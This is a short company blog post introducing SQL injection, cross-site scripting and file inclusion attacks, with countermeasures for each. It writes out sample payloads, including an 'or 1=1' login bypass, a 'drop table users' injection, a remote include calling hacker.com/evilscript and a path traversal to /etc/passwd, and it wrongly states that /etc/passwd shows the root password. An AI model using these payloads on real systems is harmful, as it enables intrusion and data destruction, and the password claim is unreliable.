By Ysquare Posted December 8, 2021

Web Applications are mainly used commercial transactions and sensitive data transfers nowadays. Most of the web application contains security vulnerabilities which enables attacker to exploit them. The term vulnerability refers to a flaw or misconfiguration in a website or web application code in a system that can leave the system open to exploitation.

This allows the attacker to steal data, distribute malicious code and spam content into the vulnerable site. In this article, let us see some of the common web application exploitation techniques and its countermeasures.

 

SQL injection

SQL injection is a technique that an attacker can use to exploit web applications that uses client input to directly execute the SQL query. Typically a SQL query may contains insert/update or select statements to push or pull data from the database. This may allow the attacker to get sensitive records, execute malicious SQL scripts. Consider this scenario of logging into a web application. In backend we will check the user name and password with SQL query and if it matches then we will allow the user to login.

Normal Scenario

Username : admin

Password : admin@123

Query: select * from users where name= ‘admin’ and pass=’admin@123’.

But this behavior can tampered with SQL injection attack as given below.

Username : admin

Password : ‘or 1=1 —

Query: select * from users where name= ‘admin’ and pass=’’  or 1=1 –‘

This above query now checks for an empty password, or the condition  1=1, then a valid row will be found in the users table. The first ‘ quote is used to terminate the string and  ’– ‘ is used to comments the remaining  portion of the query.

Username : ‘ or 1=1; drop table users; —

Password :

Query: select * from users where name= ‘’ or 1=1; drop table users; — and pass=’’.

This above query can be manipulated to drop any table. This vulnerability is very critical in financial situation where the attacker can able to change transaction, balance etc. Using this attack it is also possible to shut down the SQL server completely.

Cross site scripting Cross-Site Scripting an application-layer web attacks. It is achieved using client-side code injection. The attacker aims to execute malicious scripts in a web browser. There are two types of this attack. Persistent XSS Consider a web application that allows users to share posts that will be displayed on each user feed page. The application stores each posts in database. The attacker inputs malicious JavaScript code as part of the post and submits it. When other users view the attacker’s posts , the malicious code automatically executes in their browser Reflective XSS These attacks are mostly carried out by delivering a payload directly to the victim. For example, the attacker could send the victim a email with a link containing malicious JavaScript. If the victim clicks on the link, the request is passed from the victim’s browser and sent to the malicious web application. The malicious JavaScript is then reflected back to the victim’s browser, where it is executed. Countermeasures: Validating input coming from web applications in server side. Sanitizing user input. Avoid outputting data received as input directly to the browser without checking it for malicious code.

File inclusion attack Remote File Inclusion that allows the attacker to upload a custom malicious file on a website or server using a script. When a website dynamically loads a page based on the user input or based on the URL path, this attack would be carried out. A page with a URL like this example.com/index.php?page=home can be modified to example.com/index.php?page=http://hacker.com/evilscript The above request would execute content inside the script file in the server side and pulsl out the results and show it to the attacker in the web page. Sometimes we can directly get the contents of the files inside the server too. If the server is running Linux, the attacker can able to get the root password by issuing this command in script file example.com/index.php?page=../../../../../../../../etc/passwd This will display the server’s root password in the web attacker’s web page. Countermeasures: Avoid file inclusion based on search term or user input. Restrict access to sensitive information in server. Keep the server running with less privileges.

  • Tags:

RELATED POSTS

AUTOMATION TESTING USING SELENIUM

What is the first thought that comes to our minds when we hear the term automation? Loss of jobs, Unemployment, Robots are going to control the world and a lot more of our vivid scientific movie imaginations.

Leave a Reply

Your email address will not be published.

PREVIOUS POST
AUTOMATION TESTING USING SELENIUM
NEXT POST
HOW AUGMENTED REALITY IS DRIVING BUSINESS GROWTH IN RETAIL INDUSTRY

Let’s collaborate!

Let us supercharge your business with bespoke solutions and products.

Close Bitnami banner
Bitnami